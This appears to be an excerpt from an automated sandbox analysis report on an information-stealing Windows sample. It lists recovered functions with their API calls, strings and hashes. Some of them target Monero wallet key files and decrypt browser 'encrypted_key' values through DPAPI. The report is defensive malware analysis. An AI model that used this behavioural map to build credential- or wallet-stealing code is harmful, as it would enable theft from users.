                          • API String ID: 211194620-0
                          • Opcode ID: 70da16c57a73d8da1cbe1ea60ded7f406442e6990bafcca6848504f05d931850
                          • Instruction ID: 5f9d43623d0b2e0d5de03e2ba5ca51409a4d12c3082a75bc324e746d87a862c7
                          • Opcode Fuzzy Hash: 70da16c57a73d8da1cbe1ea60ded7f406442e6990bafcca6848504f05d931850
                          • Instruction Fuzzy Hash: D39101729102089BDB04FBA5DD96EEE7338AF14300F548269F517B60D1EF346A4DEB62
                          Function 00BFD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFD801
                          • lstrlen.KERNEL32(00000000), ref: 00BFD99F
                          • lstrlen.KERNEL32(00000000), ref: 00BFD9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: aad277ee846435e107a157d96ee5a8a43a9fc5b93de3be969eb4afae3d18321f
                          • Instruction ID: b9ed3510a95869b46f3114db9c1025b4c43d6a9c69cc32786792069c68eaa766
                          • Opcode Fuzzy Hash: aad277ee846435e107a157d96ee5a8a43a9fc5b93de3be969eb4afae3d18321f
                          • Instruction Fuzzy Hash: FD8123729102089BDB04FBA5DD96EEE7338AF54300F548529F507B60D1EF346A4DEB62
                          Function 00C03560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: f29838574a626b2ae2800bf7723bdb2dd29cd363f9173b6d5ca611adffcd7d3a
                          • Instruction ID: 9aa8bba740e76623c980e72f30719480308dac244735d12ecb300a054a261346
                          • Opcode Fuzzy Hash: f29838574a626b2ae2800bf7723bdb2dd29cd363f9173b6d5ca611adffcd7d3a
                          • Instruction Fuzzy Hash: CA413F71D10209AFCB04EFE5D849AFEB778BB44304F108128F516762D0DB759A4ADFA1
                          Function 00BF9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BF9D39
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9AEF
                            • Part of subcall function 00BF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B01
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9B2A
                            • Part of subcall function 00BF9AC0: LocalFree.KERNEL32(?,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B3F
                            • Part of subcall function 00BF9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BF9B84
                            • Part of subcall function 00BF9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BF9BA3
                            • Part of subcall function 00BF9B60: LocalFree.KERNEL32(?), ref: 00BF9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: b64f31733fe866c0bb29616f0fc9635a9d1f296581ccecac536a53178fffcf71
                          • Instruction ID: 678f4d748152d5d169223874f8273a8c2cc25ed1911f55b11de7cc2694a71f5c
                          • Opcode Fuzzy Hash: b64f31733fe866c0bb29616f0fc9635a9d1f296581ccecac536a53178fffcf71
                          • Instruction Fuzzy Hash: CE3130B5D1020DABCB04EBE4DC85BFEB7B8AB48304F144569EA05A7241E7349A48CBA1
                          Function 00C092E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00C03AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C03AEE,?), ref: 00C092FC
                          • GetFileSizeEx.KERNEL32(000000FF,00C03AEE), ref: 00C09319
                          • CloseHandle.KERNEL32(000000FF), ref: 00C09327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: a4dec4b95c0660bae757ffabcb71e65a412ad8e13d0a2c1d0f8663554ca4cfbc
                          • Instruction ID: d9c5571e18a71f5675b200588d8186513b493f23d550c8281f989cf502818956
                          • Opcode Fuzzy Hash: a4dec4b95c0660bae757ffabcb71e65a412ad8e13d0a2c1d0f8663554ca4cfbc
                          • Instruction Fuzzy Hash: D0F03C75E44208BBDB10DBB2DC49F9E7BB9EB48710F10C264B651A72D0D6B0A645CF40
                          Function 00C0C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00C0C74E
                            • Part of subcall function 00C0BF9F: __amsg_exit.LIBCMT ref: 00C0BFAF
                          • __getptd.LIBCMT ref: 00C0C765
                          • __amsg_exit.LIBCMT ref: 00C0C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00C0C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 00975b6f0fd4411af45f458bbc957e4275da1b0c58eb53df27940fe4e48b4094
                          • Instruction ID: ec7779bc3a069370eddb6bc49a10c829f99eebe393c8f86a00994b9b33bb4a2e
                          • Opcode Fuzzy Hash: 00975b6f0fd4411af45f458bbc957e4275da1b0c58eb53df27940fe4e48b4094
                          • Instruction Fuzzy Hash: 75F09A329443119BD720BBFC9886B8E33A06F00720F208249F424A71D2CB645E41FE56
                          Function 00C04F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04F7A
                          • lstrcat.KERNEL32(?,00C11070), ref: 00C04F97
                          • lstrcat.KERNEL32(?,006E8B90), ref: 00C04FAB
                          • lstrcat.KERNEL32(?,00C11074), ref: 00C04FBD
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C0492C
                            • Part of subcall function 00C04910: FindFirstFileA.KERNEL32(?,?), ref: 00C04943
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FDC), ref: 00C04971
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FE0), ref: 00C04987
                            • Part of subcall function 00C04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C04B7D
                            • Part of subcall function 00C04910: FindClose.KERNEL32(000000FF), ref: 00C04B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: d9d8de6f03ca734d2131886bb9f43b986e9f91addbb822091243fdcd977226a7
                          • Instruction ID: 4437aa22aedf5ac4a6612bd8e951eb068344652f9edf4fad6914a67195956cee
                          • Opcode Fuzzy Hash: d9d8de6f03ca734d2131886bb9f43b986e9f91addbb822091243fdcd977226a7
                          • Instruction Fuzzy Hash: 2E21887690020CABC754FB60DC4AEED377CAB54700F044564B6D9631C1EE7596CCDB92